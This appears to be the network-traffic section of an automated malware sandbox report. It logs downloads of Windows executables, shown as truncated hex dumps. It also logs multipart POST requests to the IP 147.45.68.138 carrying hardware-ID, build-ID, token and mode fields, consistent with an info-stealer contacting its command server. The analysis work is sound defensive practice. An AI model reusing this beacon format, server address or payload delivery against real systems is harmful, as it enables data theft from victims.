00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:28 GMTContent-Type: application/octet-streamContent-Length: 257872Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-3ef50"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:28 GMTContent-Type: application/octet-streamContent-Length: 80880Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-13bf0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:28 GMTContent-Type: application/octet-streamContent-Length: 2046288Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-1f3950"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:35 GMTContent-Type: application/octet-streamContent-Length: 328744Last-Modified: Thu, 29 Aug 2024 19:35:43 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d0cd8f-50428"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 19 cd d0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d2 04 00 00 0a 00 00 00 00 00 00 ae f1 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 fe 11 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 f1 04 00 53 00 00 00 00 00 05 00 2e 06 00 00 00 00 00 00 00 00 00 00 00 de 04 00 28 26 00 00 00 20 05 00 0c 00 00 00 20 f0 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 d1 04 00 00 20 00 00 00 d2 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2e 06 00 00 00 00 05 00 00 08 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 f1 04 00 00 00 00 00 48 00 00 00 02 00 05 00 78 df 04 00 a8 10 00 00 03 00 02 00 0e 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 8a 02 61 81 e9 db 99 1d 0e 63 3f cc 36 14 88 55 d0 9b 43 4d 66 27 08 3c a8 73 14 6f 6f 98 a0 3c 43 da b5 71 92 77 4e bc 65 c8 ce 69 ed ef 13 65 34 2b 84 99 cd d1 9d 8e 01 83 ff ce 16 1f 52 c6 9c dd 31 62 72 85 b0 bb 49 55 55 3c 12 4e 02 ea 19 7c 63 b1 56 47 48 ed ee e1 24 89 26 7e ac 2b a5 e4 c7 83 90 3c 33 38 f5 a4 b3 7f 74 52 5d 42 8c 7a de 34 2d 6f 43 ed 7b a7 82 18 ee e0 1b 7b 39 96 ad e7 78 30 77 ea 95 49 37 ca 5f a9 3b 21 27 71 ac d8 55 8b a8 ca 3f 82 60 bb ee 2f de 2b 2c 50 cf 82 4d 8f e5 bc 09 8c f1 1b 38 94 b6 7d fb 33 6a ca 9c 24 ce 59 3d 32 c8 dd a7 a7 29 b1 57 d1 5d 0f 74 2a 5a f1 bc 3e d2 ff 67 32 01 69 2d cf ba b6 0c f2 e1 87 49 0b eb 95 5b eb 8d 77 0b 05 1c b9 9d 75 c3 e1 d5 03 c9 c5 07 c9 fa ce 68 a4 8e 61 c5 33 d0 51 2a c4 ec 0c 98 79 d5 05 b1 c8 e9 e9 0e 3d 63 32 b0 84 6e ab 08 ef a4 99 05 8b c8 51 d5 4a 3e f8 aa 03 3d ce 8d 66 bd 18 77 1b e3 45 2d 60 fa 80 01 ce 2f aa 06 f
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:37 GMTContent-Type: application/octet-streamContent-Length: 196648Last-Modified: Thu, 29 Aug 2024 19:35:54 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d0cd9a-30028"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ee cc d0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 ce 02 00 00 0a 00 00 00 00 00 00 ae ed 02 00 00 20 00 00 00 00 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 4e 2c 03 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 ed 02 00 53 00 00 00 00 00 03 00 2e 06 00 00 00 00 00 00 00 00 00 00 00 da 02 00 28 26 00 00 00 20 03 00 0c 00 00 00 20 ec 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 cd 02 00 00 20 00 00 00 ce 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2e 06 00 00 00 00 03 00 00 08 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 d8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 ed 02 00 00 00 00 00 48 00 00 00 02 00 05 00 78 db 02 00 a8 10 00 00 03 00 02 00 0e 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 26 28 81 2c 58 16 1e 55 f4 66 8b 68 95 e3 26 5c f4 fa 06 3d 45 e8 fc c8 d8 f7 25 22 3d 6d 3f 2a 3c 16 1c bf 55 1d a6 48 66 c2 74 24 96 d1 9a c9 12 c7 13 55 21 ba 42 8b 23 9b 95 3a c7 10 64 b8 fc 45 91 96 0c 5c 17 8e 4a 31 be dc 39 09 0f ae e7 c1 19 df 4b e2 6c 58 d8 47 52 41 8a ec 36 7c 5e 8c 2e d7 6f 91 82 d0 a8 eb 40 c7 90 26 cb a6 ca 35 12 ce 94 8b 09 bd 0b cd c3 3a 95 e4 f9 01 69 20 bf 58 6d 9e 95 58 6a a6 97 ff 0d 5f 30 22 4c 8a 58 8f 45 4f 20 6a 05 83 25 af d4 b0 6d 6e 9a 45 63 54 25 d6 33 43 c8 29 29 cd fa 5e 06 3a a9 54 6e 37 c3 77 c9 0b 59 df c9 2e a7 60 5b 41 ca 74 79 e1 ba e9 0f 4e b5 a5 ed c7 bf 6a a3 18 b8 73 c2 7c 51 54 3f 86 39 c7 e7 27 fe 3a e4 9e 6c 93 24 c9 7b 26 56 dc e0 7d ad 39 98 03 6e 65 73 af c4 85 5b e7 d5 f2 3f fd 77 71 52 2f 5f 4a 55 81 38 bf 69 72 5f 52 a7 18 12 68 da f2 79 3c b3 3c 09 b9 40 2f 08 fa d3 cf ec 02 27 10 c0 e8 2d 55 a9 18 76 38 d5 46 b3 32 7a 11 c3 5
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAECAECFCAAEBFHIEHDHost: 147.45.68.138Content-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 35 37 31 39 37 39 41 44 45 32 33 39 32 34 36 39 36 33 33 30 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 2d 2d 0d 0a Data Ascii: ------GDAECAECFCAAEBFHIEHDContent-Disposition: form-data; name="hwid"C4571979ADE23924696330-a33c7340-61ca------GDAECAECFCAAEBFHIEHDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------GDAECAECFCAAEBFHIEHD--
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHIDHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 2d 2d 0d 0a Data Ascii: ------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="mode"1------GHJKJDAKEHJDGDGDGHID--
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCAHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 2d 2d 0d 0a Data Ascii: ------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="mode"2------DHIEBAAKJDHIECAAFHCA--
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAKKKKJDBKKFIEBKEHDHost: 147.45.68.138Content-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 